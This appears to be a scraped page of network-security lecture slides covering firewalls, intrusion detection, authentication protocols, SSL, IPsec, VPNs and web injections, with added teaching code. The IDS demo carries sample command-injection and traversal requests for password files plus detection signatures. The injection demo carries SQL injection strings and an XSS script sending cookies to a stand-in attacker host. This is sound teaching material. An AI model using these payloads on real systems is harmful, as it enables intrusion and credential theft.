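    print(ack_scan(StatefulFilter()))              # []: no matching connection
    print(legitimate_browsing(StatefulFilter()))   # ('allow', 'allow')
```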

Application Proxy
- A proxy is something that acts on your behalf
- An application proxy looks at the incoming application data and verifies that the data is safe before letting it in
- Advantages? Complete view of connections and application data; filters bad data at the application layer (viruses, Word macros)
- Disadvantages? Speed

Deep Packet Inspection
- Many buzzwords are used for firewalls; one example is deep packet inspection
- What could this mean? Look into the packets, but don't really process them
- Effect like an application proxy, but faster

Firewalls and Defense in Depth
Typical network security architecture (figure): Internet, then a packet filter, then the DMZ (Web server, FTP server, DNS server), then an application proxy, then the intranet with additional defense

Intrusion Detection Systems

Intruders
- A significant issue: hostile/unwanted trespass, from benign to serious
- User trespass: unauthorized logon, privilege abuse
- Software trespass: virus, worm, or trojan horse
- Classes of intruders: masquerader, misfeasor, clandestine user

Examples of Intrusion
- remote root compromise
- web server defacement
- guessing / cracking passwords
- copying or viewing sensitive data / databases
- running a packet sniffer
- distributing pirated software
- using an unsecured modem to access the net
- impersonating a user to reset a password
- using an unattended workstation

Security Intrusion & Detection
- Security intrusion: a security event, or combination of multiple security events, that constitutes a security incident in which an intruder gains, or attempts to gain, access to a system (or system resource) without having authorization to do so.
- Intrusion detection: a security service that monitors and analyzes system events for the purpose of finding, and providing real-time or near real-time warning of, attempts to access system resources in an unauthorized manner.

Intrusion Detection Systems
- Intrusion detection approaches: signature-based IDS; anomaly-based IDS
- Intrusion detection architectures: host-based IDS; network-based IDS
- Logical components: sensors (collect data); analyzers (determine whether an intrusion has occurred); user interface (manage / direct / view the IDS)

Host-Based IDS
- Monitors activities on hosts for known attacks and suspicious behavior
- Designed to detect attacks such as buffer overflows and escalation of privilege
- Little or no view of network activities

Distributed Host-Based IDS (figure)

Network-Based IDS
- Monitors activity on the network for known attacks and suspicious network activity
- Designed to detect attacks such as denial of service, network probes, malformed packets, etc.
- Some overlap with firewalls
- Little or no view of host-based attacks
- One can have both host and network IDS

NIDS Sensor Deployment (figure)

IDS Principles
- Assume that intruder behavior differs from that of legitimate users
- Expect overlap, as shown (figure: the probability density of intruder behavior overlaps that of authorized users)
- Observe deviations from past history
- Problems of false positives and false negatives; one must compromise
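The two detection approaches side by side over a handful of constructed web-server log lines, as an added example that is not from the original slides. The signature detector catches the two requests that match known-bad patterns and says nothing about the password guessing, for which no signature exists; the anomaly detector catches the guessing from its deviation from a baseline failure rate, and its threshold is exactly the false-positive versus false-negative trade-off of the slide above. The log lines, the signature list, the baseline and the threshold are all made up for the example.

```python
"""Signature-based and anomaly-based detection over constructed log lines.

Added example, not from the original slides. Log, signatures, baseline and
threshold are constructed; a real IDS carries thousands of signatures and a
learned baseline.
"""
import re
from collections import Counter

# Constructed access log: "<client ip> <request path> <status>"
LOG = """\
10.0.0.8 /index.html 200
10.0.0.8 /about.html 200
198.51.100.3 /cgi-bin/test.cgi?cmd=;cat%20/etc/passwd 404
10.0.0.9 /login 200
10.0.0.9 /login 401
10.0.0.9 /login 401
10.0.0.9 /login 401
10.0.0.9 /login 401
10.0.0.9 /login 401
10.0.0.9 /login 401
198.51.100.3 /admin/../../../../etc/shadow 403
10.0.0.8 /news.html 200
"""

# Signature-based: patterns of known attacks (constructed for the example)
SIGNATURES = {
    "directory traversal": re.compile(r"\.\./"),
    "command injection": re.compile(r"[;|`]|%3b", re.I),
    "sensitive file access": re.compile(r"/etc/(passwd|shadow)"),
}

# Anomaly-based: how many failed logins per client a normal window shows (constructed)
BASELINE_401_PER_IP = 1
ANOMALY_FACTOR = 3        # alert at 3x baseline; lower it and false positives rise,
                          # raise it and slow guessing becomes a false negative


def parse(log):
    for line in log.splitlines():
        ip, path, status = line.split(" ", 2)
        yield ip, path, int(status)


def signature_alerts(log):
    """Every request matching a known-bad pattern. Cannot see the password
    guessing: nothing in a single '/login 401' line matches a signature."""
    alerts = []
    for ip, path, _ in parse(log):
        for name, pattern in SIGNATURES.items():
            if pattern.search(path):
                alerts.append((ip, name))
    return alerts


def anomaly_alerts(log):
    """Clients whose failed-login count deviates from the baseline. Catches the
    guessing no signature describes, and would also flag a legitimate user who
    forgot a password six times: the false-positive side of the trade-off."""
    failures = Counter(ip for ip, path, status in parse(log)
                       if path == "/login" and status == 401)
    return sorted(ip for ip, n in failures.items()
                  if n >= ANOMALY_FACTOR * BASELINE_401_PER_IP)


if __name__ == "__main__":
    for alert in signature_alerts(LOG):
        print("signature:", alert)
    for ip in anomaly_alerts(LOG):
        print("anomaly: excessive failed logins from", ip)
```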

Internet security protocols

Protocol
- Human protocols: the rules followed in human interactions; example: asking a question in class
- Networking protocols: the rules followed in networked communication systems; examples: HTTP, FTP, etc.
- Security protocol: the (communication) rules followed in a security application; examples: SSL, IPsec, Kerberos, etc.

Secure Entry to NSA
1. Insert badge into reader
2. Enter PIN
3. Correct PIN? Yes: enter. No: get shot by the security guard

ATM Machine Protocol
1. Insert ATM card
2. Enter PIN
3. Correct PIN? Yes: conduct your transaction(s). No: the machine (eventually) eats the card

Identify Friend or Foe (IFF)
(figure: a SAAF Impala over Namibia challenges an aircraft over Angola; both sides hold the key K)
1. Challenge: N
2. Response: E(N,K)

MiG in the Middle
(figure)
1. The SAAF Impala challenges the Russian MiG with N
2. The MiG forwards N to its own side over Angola
3. The Angolan side challenges a SAAF Impala over Namibia with the same N
4. That Impala, which holds K, answers E(N,K)
5. The answer is forwarded back to the MiG
6. The MiG replies E(N,K) and passes the IFF check without ever knowing K

Authentication protocol

Authentication
- Alice must prove her identity to Bob; Alice and Bob can be humans or computers
- May also require Bob to prove he's Bob (mutual authentication)
- Probably need to establish a session key
- May have other requirements, such as: use public keys; use symmetric keys; use hash functions; anonymity, plausible deniability, etc., etc.

Authentication
- Authentication on a stand-alone computer is relatively simple: hash the password with a salt, etc.; secure path, attacks on the authentication software, keystroke logging, etc., are the issues
- Authentication over a network is challenging: the attacker can passively observe messages; the attacker can replay messages; active attacks are possible (insert, delete, change)

Simple Authentication
Alice -> Bob: "I'm Alice"
Bob -> Alice: "Prove it"
Alice -> Bob: "My password is frank"
- Simple, and may be OK for a standalone system
- But insecure for a networked system: subject to a replay attack (next 2 slides)
- Also, Bob must know Alice's password

Authentication Attack
Trudy observes the exchange:
Alice -> Bob: "I'm Alice"
Bob -> Alice: "Prove it"
Alice -> Bob: "My password is frank"

Authentication Attack
Later, Trudy repeats it:
Trudy -> Bob: "I'm Alice"
Bob -> Trudy: "Prove it"
Trudy -> Bob: "My password is frank"
- This is an example of a replay attack
- How can we prevent a replay?

Better Authentication
Alice -> Bob: "I'm Alice"
Bob -> Alice: "Prove it"
Alice -> Bob: h(Alice's password)
- Better, since it hides Alice's password from both Bob and Trudy
- But still subject to replay

Challenge-Response
- To prevent replay, use challenge-response; the goal is to ensure freshness
- Suppose Bob wants to authenticate Alice: a challenge is sent from Bob to Alice
- The challenge is chosen so that replay is not possible, only Alice can provide the correct response, and Bob can verify the response

Nonce
- To ensure freshness we can employ a nonce: nonce = number used once
- What to use for nonces? That is, what is the challenge?
- What should Alice do with the nonce? That is, how to compute the response?
- How can Bob verify the response?
- Should we rely on passwords or keys?

Challenge-Response
Alice -> Bob: "I'm Alice"
Bob -> Alice: Nonce
Alice -> Bob: h(Alice's password, Nonce)
- The nonce is the challenge; the hash is the response
- The nonce prevents replay and ensures freshness
- The password is something Alice knows
- Bob must know Alice's password to verify

Generic Challenge-Response
Alice -> Bob: "I'm Alice"
Bob -> Alice: Nonce
Alice -> Bob: something that could only be from Alice (and that Bob can verify)
- In practice, how to achieve this? A hashed password works; encryption is better here (why?)

Symmetric Key Notation
- Encrypt plaintext P with key K: C = E(P,K)
- Decrypt ciphertext C with key K: P = D(C,K)
- Here we are concerned with attacks on protocols, not attacks on crypto, so we assume the crypto algorithms are secure

Authentication: Symmetric Key
- Alice and Bob share a symmetric key K, known only to Alice and Bob
- Authenticate by proving knowledge of the shared symmetric key
- How to accomplish this? Must not reveal the key, must not allow replay (or other) attacks, must be verifiable, ...

Authentication with Symmetric Key
Alice -> Bob: "I'm Alice"
Bob -> Alice: R
Alice -> Bob: E(R,K)
- A secure method for Bob to authenticate Alice
- Alice does not authenticate Bob
- So, can we achieve mutual authentication?

Mutual Authentication?
Alice -> Bob: "I'm Alice", R
Bob -> Alice: E(R,K)
Alice -> Bob: E(R,K)
- What's wrong with this picture? Alice could be Trudy (or anybody else)! Bob's own reply is exactly the message the third step requires, so anyone can echo it back.

Mutual Authentication
- Since we have a secure one-way authentication protocol, the obvious thing to do is to use the protocol twice: once for Bob to authenticate Alice, once for Alice to authenticate Bob
- This has got to work...

Mutual Authentication
Alice -> Bob: "I'm Alice", R_A
Bob -> Alice: R_B, E(R_A, K)
Alice -> Bob: E(R_B, K)
- This provides mutual authentication... or does it? See the next slide

Mutual Authentication Attack
1. Trudy -> Bob: "I'm Alice", R_A
2. Bob -> Trudy: R_B, E(R_A, K)
3. Trudy -> Bob (a second session): "I'm Alice", R_B
4. Bob -> Trudy: R_C, E(R_B, K)
Trudy now holds E(R_B, K), the very response the first session is waiting for, and completes it without knowing K.

Mutual Authentication
- Our one-way authentication protocol is not secure when used for mutual authentication
- Protocols are subtle! The obvious thing may not be secure
- Also, if the assumptions or the environment change, the protocol may no longer be secure; this is a common source of security failure, for example in Internet protocols

Symmetric Key Mutual Authentication
Alice -> Bob: "I'm Alice", R_A
Bob -> Alice: R_B, E("Bob", R_A, K)
Alice -> Bob: E("Alice", R_B, K)
- Do these insignificant changes help? Yes! Bob's reply now proves knowledge of K for R_A but is not the message Bob expects back for R_B, so reflecting it achieves nothing.
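The reflection attack and the identity-tagged fix executed end to end, as an added example that is not from the original slides. Bob is modelled as a server that can hold several sessions open at once, which is all Trudy needs. E(X,K) is replaced by HMAC-SHA256(K, X), a keyed function Trudy cannot compute without K, which is the only property the protocol relies on (the slide assumes the cipher itself is secure); the shared key and the nonces are constructed here.

```python
"""Symmetric-key mutual authentication from the slides: Trudy's reflection
attack on the first protocol, and the identity-tagged fix.

Added example, not from the original slides. E(msg, K) is stood in for by
HMAC-SHA256(K, msg); key and nonces are constructed.
"""
import hashlib
import hmac
import secrets

K = b"shared-key-known-only-to-alice-and-bob"      # constructed shared key


def E(msg, key=K):
    """Stand-in for E(msg, K): a keyed tag only a holder of K can produce or check."""
    return hmac.new(key, msg, hashlib.sha256).digest()


class Bob:
    """Bob keeps one pending challenge per session, so two sessions may be open at once."""

    def __init__(self, tag_identities):
        self.tag_identities = tag_identities   # False: first protocol; True: the fix
        self.pending = {}                      # session id -> R_B
        self.authenticated = set()

    def msg1(self, session, claimed_name, r_a):
        """Receives 'I'm Alice', R_A. Answers R_B and E(R_A,K), or E('Bob',R_A,K) in the fix."""
        r_b = secrets.token_bytes(16)
        self.pending[session] = r_b
        proof = E(b"Bob" + r_a) if self.tag_identities else E(r_a)
        return r_b, proof

    def msg3(self, session, response):
        """Receives E(R_B,K), or E('Alice',R_B,K) in the fix. Accepts if it verifies."""
        r_b = self.pending.pop(session)
        expected = E(b"Alice" + r_b) if self.tag_identities else E(r_b)
        if hmac.compare_digest(response, expected):
            self.authenticated.add(session)
            return True
        return False


def honest_alice(bob):
    """Alice knows K: she checks Bob's proof, then answers his challenge."""
    r_a = secrets.token_bytes(16)
    r_b, proof = bob.msg1("alice-1", b"Alice", r_a)
    expected = E(b"Bob" + r_a) if bob.tag_identities else E(r_a)
    if not hmac.compare_digest(proof, expected):
        return False                           # Bob failed to prove himself
    response = E(b"Alice" + r_b) if bob.tag_identities else E(r_b)
    return bob.msg3("alice-1", response)


def trudy_reflection(bob):
    """Trudy has no key. She opens a second session using Bob's own challenge R_B as
    her nonce and feeds his answer back into the first session (slide steps 1-4).
    Returns True if Bob wrongly accepts her as Alice."""
    r_a = secrets.token_bytes(16)
    r_b, _ = bob.msg1("trudy-1", b"Alice", r_a)                  # steps 1-2
    _r_c, proof_for_r_b = bob.msg1("trudy-2", b"Alice", r_b)     # steps 3-4: R_B reflected
    return bob.msg3("trudy-1", proof_for_r_b)                    # Bob's E(R_B,K) closes session 1


if __name__ == "__main__":
    print(trudy_reflection(Bob(tag_identities=False)))   # True: the attack on the slide works
    print(trudy_reflection(Bob(tag_identities=True)))    # False: E("Bob",R_B) is not E("Alice",R_B)
    print(honest_alice(Bob(tag_identities=True)))        # True: the fix still lets Alice in
```

With identities inside the encrypted block, the thing Bob hands out (a proof tagged "Bob") can never be the thing Bob expects to receive (a proof tagged "Alice"), which is the whole content of the "insignificant changes" on the slide.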

Internet security protocols

Protocols: SSL

Secure Sockets Layer (SSL)
- transport layer security service
- originally developed by Netscape; version 3 was designed with public input
- subsequently became an Internet standard: RFC 2246, Transport Layer Security (TLS)
- uses TCP to provide a reliable end-to-end service
- may be provided in the underlying protocol suite or embedded in specific packages

What is SSL?
- SSL is the protocol used for the majority of secure transactions on the Internet
- For example, if you want to buy a book at amazon.com: you want to be sure you are dealing with Amazon (authentication), and your credit card information must be protected in transit (confidentiality and/or integrity)
- As long as you have money, Amazon doesn't really care who you are, so there is no need for mutual authentication

SSL Protocol Stack
(figure: the socket layer sits between the application and transport layers; the application runs in user space, transport and network in the OS, link and physical on the NIC)

SSL Record Protocol Services
- message integrity: a MAC with a shared secret key, similar to HMAC but with different padding
- confidentiality: symmetric encryption with a shared secret key defined by the Handshake Protocol (AES, IDEA, RC2-40, DES-40, DES, 3DES, Fortezza, RC4-40, RC4-128)
- the message is compressed before encryption

Simple SSL-like Protocol
Alice -> Bob: "I'd like to talk to you securely"
Bob -> Alice: "Here's my certificate"
Alice -> Bob: {K}_Bob (a session key encrypted with Bob's public key)
Alice <-> Bob: protected HTTP
- Is Alice sure she's talking to Bob? Only to the extent that she validates the certificate: then only the holder of Bob's private key can recover K and continue the conversation
- Is Bob sure he's talking to Alice? No, nothing in the exchange identifies Alice

Internet security protocols (Segurança Informática - MIM 2011/12)

SSL Authentication
- Alice authenticates Bob, not vice versa
- How does the client authenticate the server? Why would the server not authenticate the client?
- Mutual authentication is possible: Bob sends a certificate request in message 2; the client must then have a valid certificate
- If the server wants to authenticate the client, it could instead require a password

Protocols: IPsec

IP Security
- various application security mechanisms exist, e.g. S/MIME, PGP, Kerberos, SSL/HTTPS
- security concerns cross protocol layers
- hence we would like security implemented by the network, for all applications
- authentication and encryption security features are included in next-generation IPv6 and are also usable in existing IPv4

SSL vs IPsec
IPsec
- lives at the network layer (part of the OS)
- encryption, integrity, authentication, etc.
- is overly complex (some security issues)
SSL (and the IETF standard known as TLS)
- lives at the socket layer (part of user space)
- encryption, integrity, authentication, etc.
- relatively simple and elegant specification

SSL vs IPsec
- IPsec: the OS must be aware, but not the applications
- SSL: the applications must be aware, but not the OS
- SSL was built into the Web early on (Netscape)
- IPsec is often used in VPNs (secure tunnels)
- reluctance to retrofit applications for SSL
- IPsec not widely deployed (complexity, etc.)
- The bottom line: the Internet is less secure than it should be!

IPsec and SSL
- IPsec lives at the network layer
- IPsec is transparent to applications
(figure: SSL drawn at the socket layer above transport, in user space; IPsec at the network layer, inside the OS)

IPsec
- general IP security mechanisms
- provides authentication, confidentiality and key management
- applicable over LANs, across public and private WANs, and for the Internet

IPsec Uses
(figure only)

Two protocols
- Authentication Header (AH): provides source authentication and data integrity, but not confidentiality
- Encapsulating Security Payload (ESP): provides source authentication, data integrity and confidentiality; more widely used than AH

Comparison of IPsec Modes
Original packet: IP header | data
Transport mode: IP header | ESP/AH | data (host-to-host)
Tunnel mode: new IP header | ESP/AH | IP header | data (firewall-to-firewall)
- Transport mode is not strictly necessary, since tunnel mode can carry the same traffic, but it is more efficient (no second IP header)

IPsec Transport mode
- the IPsec datagram is emitted and received by the end systems
- protects the upper-level protocols
(figure: host <- IPsec secured -> host)

IPsec Tunnel mode
- the end routers are IPsec aware; the hosts need not be
(figure: host <- plain IP -> router <- IPsec secured -> router <- plain IP -> host)
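The two ESP modes at the byte level, as an added example that is not part of the slides. It encapsulates the same inner packet in transport mode (host to host) and tunnel mode (gateway to gateway), then shows what an on-path eavesdropper can read in each case and that a modified packet fails the ICV check on receipt. Everything here is a simplification made for the demo: no IP checksum, no IV, no anti-replay window, and the cipher is a toy CTR-style keystream derived from HMAC-SHA256 standing in for AES/3DES. The addresses, keys and TCP payload are constructed sample data.

```python
"""ESP transport vs tunnel mode, byte-level (didactic, not a real IPsec stack)."""
import hashlib
import hmac
import ipaddress
import struct

ESP = 50    # IP protocol number carried in the outer header
TCP = 6
IPV4 = 4    # next-header value meaning "a whole IP packet follows" (tunnel mode)


def ipv4_header(src: str, dst: str, proto: int, payload_len: int) -> bytes:
    """Minimal 20-byte IPv4 header: no options, checksum left at zero."""
    return struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + payload_len, 0, 0, 64,
                       proto, 0, ipaddress.IPv4Address(src).packed,
                       ipaddress.IPv4Address(dst).packed)


def parse_ipv4(pkt: bytes) -> dict:
    _, _, total, _, _, _, proto, _, src, dst = struct.unpack("!BBHHHBBH4s4s", pkt[:20])
    return {"src": str(ipaddress.IPv4Address(src)),
            "dst": str(ipaddress.IPv4Address(dst)),
            "proto": proto, "payload": pkt[20:total]}


def keystream_xor(key: bytes, spi: int, seq: int, data: bytes) -> bytes:
    """Toy stream cipher: XOR with HMAC-SHA256(key, spi || seq || block counter)."""
    out = bytearray()
    for i in range(0, len(data), 32):
        block = hmac.new(key, struct.pack("!IIQ", spi, seq, i // 32),
                         hashlib.sha256).digest()
        out += bytes(a ^ b for a, b in zip(data[i:i + 32], block))
    return bytes(out)


def esp_encapsulate(enc_key, auth_key, spi, seq, inner, next_header) -> bytes:
    """ESP header | encrypted(inner | padding | pad_len | next_header) | ICV."""
    esp_hdr = struct.pack("!II", spi, seq)
    pad_len = (-(len(inner) + 2)) % 4          # ESP pads to a 4-byte boundary
    trailer = bytes(range(1, pad_len + 1)) + bytes([pad_len, next_header])
    ciphertext = keystream_xor(enc_key, spi, seq, inner + trailer)
    icv = hmac.new(auth_key, esp_hdr + ciphertext, hashlib.sha256).digest()[:12]
    return esp_hdr + ciphertext + icv


def esp_decapsulate(enc_key, auth_key, esp_payload):
    """Verify the ICV before touching the ciphertext, then strip the trailer."""
    esp_hdr, body, icv = esp_payload[:8], esp_payload[8:-12], esp_payload[-12:]
    expected = hmac.new(auth_key, esp_hdr + body, hashlib.sha256).digest()[:12]
    if not hmac.compare_digest(icv, expected):
        raise ValueError("ESP ICV check failed: packet modified or wrong key")
    spi, seq = struct.unpack("!II", esp_hdr)
    plain = keystream_xor(enc_key, spi, seq, body)
    pad_len, next_header = plain[-2], plain[-1]
    return plain[:len(plain) - pad_len - 2], next_header


def transport_mode(keys, spi, seq, plain_pkt) -> bytes:
    """Host-to-host: original IP header kept (proto becomes ESP), only the payload is protected."""
    ip = parse_ipv4(plain_pkt)
    esp = esp_encapsulate(*keys, spi, seq, ip["payload"], ip["proto"])
    return ipv4_header(ip["src"], ip["dst"], ESP, len(esp)) + esp


def tunnel_mode(keys, spi, seq, plain_pkt, gw_src, gw_dst) -> bytes:
    """Gateway-to-gateway: the whole original packet, header included, is the ESP payload."""
    esp = esp_encapsulate(*keys, spi, seq, plain_pkt, IPV4)
    return ipv4_header(gw_src, gw_dst, ESP, len(esp)) + esp


def eavesdropper_view(wire_pkt) -> dict:
    """Everything readable without the keys: outer addresses, protocol, SPI, sequence number."""
    ip = parse_ipv4(wire_pkt)
    spi, seq = struct.unpack("!II", ip["payload"][:8])
    return {"src": ip["src"], "dst": ip["dst"], "proto": ip["proto"], "spi": spi, "seq": seq}


def receive(keys, wire_pkt) -> dict:
    """Receiver side: verify, decrypt and recover the original packet in either mode."""
    ip = parse_ipv4(wire_pkt)
    inner, nh = esp_decapsulate(*keys, ip["payload"])
    if nh == IPV4:                      # tunnel mode: the plaintext is a whole IP packet
        return parse_ipv4(inner)
    return parse_ipv4(ipv4_header(ip["src"], ip["dst"], nh, len(inner)) + inner)


# Constructed sample: 10.0.0.5 -> 10.0.1.7 over TCP; gateways 203.0.113.1 and 198.51.100.1
KEYS = (b"demo-encryption-key", b"demo-authentication-key")
PAYLOAD = b"GET /index.html HTTP/1.1"
INNER = ipv4_header("10.0.0.5", "10.0.1.7", TCP, len(PAYLOAD)) + PAYLOAD

if __name__ == "__main__":
    t = transport_mode(KEYS, 0x100, 1, INNER)
    u = tunnel_mode(KEYS, 0x100, 1, INNER, "203.0.113.1", "198.51.100.1")
    print("transport, on the wire:", eavesdropper_view(t))
    print("tunnel,    on the wire:", eavesdropper_view(u))
    print("tunnel, after receive: ", receive(KEYS, u))
```

The eavesdropper sees the real endpoints 10.0.0.5 and 10.0.1.7 in transport mode but only the two gateways in tunnel mode, which is the traffic-analysis argument for tunnel mode between sites; in both modes the SPI and sequence number stay in the clear because the receiver needs them to pick the security association and check for replay before it can verify anything.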

Internet security protocols

Benefits of IPsec
- in a firewall/router, provides strong security to all traffic crossing the perimeter
- in a firewall/router, is resistant to bypass
- is below the transport layer, hence transparent to applications
- can be transparent to end users
- can provide security for individual users
- secures the routing architecture

Protocols: VPNs

What are VPNs?
- Provide a private network service using a shared (non-private) infrastructure
(figure: private network site 1 <- shared infrastructure, e.g. the Internet -> private network site 2)

Types of VPNs
(figure: mobile user, home user, branch, partner and headquarters all connected over a shared infrastructure such as the Internet)

VPN Types
- Site-to-site: connectivity between sites
  - Intranet VPNs: sites of a single organization
  - Extranet VPNs: sites of different organizations (business partners)
- Remote access: mobile or home-based users access the organization
- Provisioned by:
  - Provider: a network provider offers the interconnection service
  - User: the organization deploys and administers the VPN infrastructure itself

Technologies for site-to-site (headquarters <-> branch)
- IPsec: encryption/authentication
- GRE (Generic Routing Encapsulation): limited/no encryption/authentication
- IP-in-IP: no encryption/authentication

Technologies for remote access (headquarters <-> mobile user)
- IPsec: encryption/authentication
- SSL/TLS: encryption/authentication; the basis of "clientless" VPNs
- PPTP (Point-to-Point Tunnelling Protocol): encryption/authentication (its MS-CHAPv2/MPPE scheme is now considered broken)
- L2TP (Layer Two Tunnelling Protocol): limited/no encryption/authentication on its own, which is why it is normally run over IPsec (L2TP/IPsec)

Protocols: S/MIME

S/MIME (Secure/Multipurpose Internet Mail Extensions)
- security enhancement to MIME e-mail
- the original Internet e-mail format, RFC 822, was text only
- MIME provided support for varying content types and multipart messages, with encoding of binary data to textual form
- S/MIME added security enhancements
- S/MIME is supported in many mail agents, e.g. MS Outlook, Mozilla, Mac Mail

S/MIME Functions
- enveloped data: encrypted content plus the associated (encrypted) content-encryption keys
- signed data: encoded message + signed digest
- clear-signed data: cleartext message + encoded signed digest, so recipients without S/MIME can still read the message
- signed & enveloped data: nesting of signed and encrypted entities

S/MIME Process
(figure only)

Other subjects

Phishing/Scams
- A fake e-mail tries to lure the victim to a website
- The website tries to steal credit card details or credentials for a real website
- Usually the website mimics a real one
- Test your might: examples from VeriSign, SonicWall and PayPal; examples of fraud from CGD

Virus / Malware
- Encrypted, polymorphic and metamorphic malware
- Trojans
- Worms
- Botnets

Botnets
(picture from Microsoft Press)

Injections
- SQL injection
- XSS (cross-site scripting)
- CSRF (cross-site request forgery)
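The first two items of the list share one root cause: untrusted input is concatenated into a structured language (SQL, HTML) and the interpreter cannot tell data from syntax. The following is an added example, not code from the slides, showing a vulnerable login query and a vulnerable HTML greeting next to their fixed versions, driven by two classic SQL-injection payloads and one script payload. It runs against an in-memory SQLite database with constructed sample users; the table, column names and passwords are assumptions made for the demo.

```python
"""SQL injection and XSS: vulnerable form beside the fix (constructed demo data)."""
import html
import sqlite3


def setup_db() -> sqlite3.Connection:
    """In-memory users table with two constructed accounts."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, pwd TEXT, role TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", [
        ("alice", "correct horse battery", "admin"),
        ("bob", "hunter2", "user"),
    ])
    return conn


def login_vulnerable(conn, user: str, pwd: str):
    """String-built query: the attacker's quotes and comments are parsed as SQL."""
    query = (f"SELECT name, role FROM users "
             f"WHERE name = '{user}' AND pwd = '{pwd}'")
    return conn.execute(query).fetchone()


def login_safe(conn, user: str, pwd: str):
    """Parameterised query: the driver binds the input as data, never as SQL."""
    return conn.execute(
        "SELECT name, role FROM users WHERE name = ? AND pwd = ?",
        (user, pwd),
    ).fetchone()


def greeting_vulnerable(name: str) -> str:
    """Reflected XSS: the name is pasted into the page as markup."""
    return f"<p>Hello, {name}!</p>"


def greeting_safe(name: str) -> str:
    """Escape for the HTML text context before interpolating."""
    return f"<p>Hello, {html.escape(name, quote=True)}!</p>"


if __name__ == "__main__":
    db = setup_db()
    # Tautology payload and comment payload; neither knows alice's password.
    for user, pwd in (("alice", "' OR '1'='1"), ("alice'--", "wrong")):
        print(repr(user), repr(pwd), "->",
              "vulnerable:", login_vulnerable(db, user, pwd),
              "safe:", login_safe(db, user, pwd))
    payload = "<script>fetch('https://attacker.example/?c=' + document.cookie)</script>"
    print(greeting_vulnerable(payload))
    print(greeting_safe(payload))
```

With the tautology payload the vulnerable query becomes `WHERE name = 'alice' AND pwd = '' OR '1'='1'`, true for every row, and with `alice'--` the rest of the condition is commented out; the parameterised version returns nothing for both. The same separation-of-data-from-syntax rule fixes the XSS case: escape for the output context (here HTML text) rather than trying to filter the input.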

7 Network Security. 7.1 Introduction 7.2 Improving the Security 7.3 Internet Security Framework. 7.5 Absolute Security?

7 Network Security. 7.1 Introduction 7.2 Improving the Security 7.3 Internet Security Framework. 7.5 Absolute Security? 7 Network Security 7.1 Introduction 7.2 Improving the Security 7.3 Internet Security Framework 7.4 Firewalls 7.5 Absolute Security? 7.1 Introduction Security of Communications data transport e.g. risk

More information

CS 356 Lecture 27 Internet Security Protocols. Spring 2013

CS 356 Lecture 27 Internet Security Protocols. Spring 2013 CS 356 Lecture 27 Internet Security Protocols Spring 2013 Review Chapter 1: Basic Concepts and Terminology Chapter 2: Basic Cryptographic Tools Chapter 3 User Authentication Chapter 4 Access Control Lists

More information

Network Security 網 路 安 全. Lecture 1 February 20, 2012 洪 國 寶

Network Security 網 路 安 全. Lecture 1 February 20, 2012 洪 國 寶 Network Security 網 路 安 全 Lecture 1 February 20, 2012 洪 國 寶 1 Outline Course information Motivation Introduction to security Basic network concepts Network security models Outline of the course 2 Course

More information

Firewalls, Tunnels, and Network Intrusion Detection

Firewalls, Tunnels, and Network Intrusion Detection Firewalls, Tunnels, and Network Intrusion Detection 1 Part 1: Firewall as a Technique to create a virtual security wall separating your organization from the wild west of the public internet 2 1 Firewalls

More information

Chapter 10. Network Security

Chapter 10. Network Security Chapter 10 Network Security 10.1. Chapter 10: Outline 10.1 INTRODUCTION 10.2 CONFIDENTIALITY 10.3 OTHER ASPECTS OF SECURITY 10.4 INTERNET SECURITY 10.5 FIREWALLS 10.2 Chapter 10: Objective We introduce

More information

Network Security. Abusayeed Saifullah. CS 5600 Computer Networks. These slides are adapted from Kurose and Ross 8-1

Network Security. Abusayeed Saifullah. CS 5600 Computer Networks. These slides are adapted from Kurose and Ross 8-1 Network Security Abusayeed Saifullah CS 5600 Computer Networks These slides are adapted from Kurose and Ross 8-1 roadmap 1 What is network security? 2 Principles of cryptography 3 Message integrity, authentication

More information

APNIC elearning: Network Security Fundamentals. 20 March 2013 10:30 pm Brisbane Time (GMT+10)

APNIC elearning: Network Security Fundamentals. 20 March 2013 10:30 pm Brisbane Time (GMT+10) APNIC elearning: Network Security Fundamentals 20 March 2013 10:30 pm Brisbane Time (GMT+10) Introduction Presenter/s Nurul Islam Roman Senior Training Specialist nurul@apnic.net Specialties: Routing &

More information

Firewalls, Tunnels, and Network Intrusion Detection. Firewalls

Firewalls, Tunnels, and Network Intrusion Detection. Firewalls Firewalls, Tunnels, and Network Intrusion Detection 1 Firewalls A firewall is an integrated collection of security measures designed to prevent unauthorized electronic access to a networked computer system.

More information

CS5008: Internet Computing

CS5008: Internet Computing CS5008: Internet Computing Lecture 22: Internet Security A. O Riordan, 2009, latest revision 2015 Internet Security When a computer connects to the Internet and begins communicating with others, it is

More information

Network Security Fundamentals

Network Security Fundamentals APNIC elearning: Network Security Fundamentals 27 November 2013 04:30 pm Brisbane Time (GMT+10) Introduction Presenter Sheryl Hermoso Training Officer sheryl@apnic.net Specialties: Network Security IPv6

More information

CS 356 Lecture 17 and 18 Intrusion Detection. Spring 2013

CS 356 Lecture 17 and 18 Intrusion Detection. Spring 2013 CS 356 Lecture 17 and 18 Intrusion Detection Spring 2013 Review Chapter 1: Basic Concepts and Terminology Chapter 2: Basic Cryptographic Tools Chapter 3 User Authentication Chapter 4 Access Control Lists

More information

2. From a control perspective, the PRIMARY objective of classifying information assets is to:

2. From a control perspective, the PRIMARY objective of classifying information assets is to: MIS5206 Week 13 Your Name Date 1. When conducting a penetration test of an organization's internal network, which of the following approaches would BEST enable the conductor of the test to remain undetected

More information

Authentication applications Kerberos X.509 Authentication services E mail security IP security Web security

Authentication applications Kerberos X.509 Authentication services E mail security IP security Web security UNIT 4 SECURITY PRACTICE Authentication applications Kerberos X.509 Authentication services E mail security IP security Web security Slides Courtesy of William Stallings, Cryptography & Network Security,

More information

Chapter 5. Data Communication And Internet Technology

Chapter 5. Data Communication And Internet Technology Chapter 5 Data Communication And Internet Technology Purpose Understand the fundamental networking concepts Agenda Network Concepts Communication Protocol TCP/IP-OSI Architecture Network Types LAN WAN

More information

Network Security [2] Plain text Encryption algorithm Public and private key pair Cipher text Decryption algorithm. See next slide

Network Security [2] Plain text Encryption algorithm Public and private key pair Cipher text Decryption algorithm. See next slide Network Security [2] Public Key Encryption Also used in message authentication & key distribution Based on mathematical algorithms, not only on operations over bit patterns (as conventional) => much overhead

More information

Network Access Security. Lesson 10

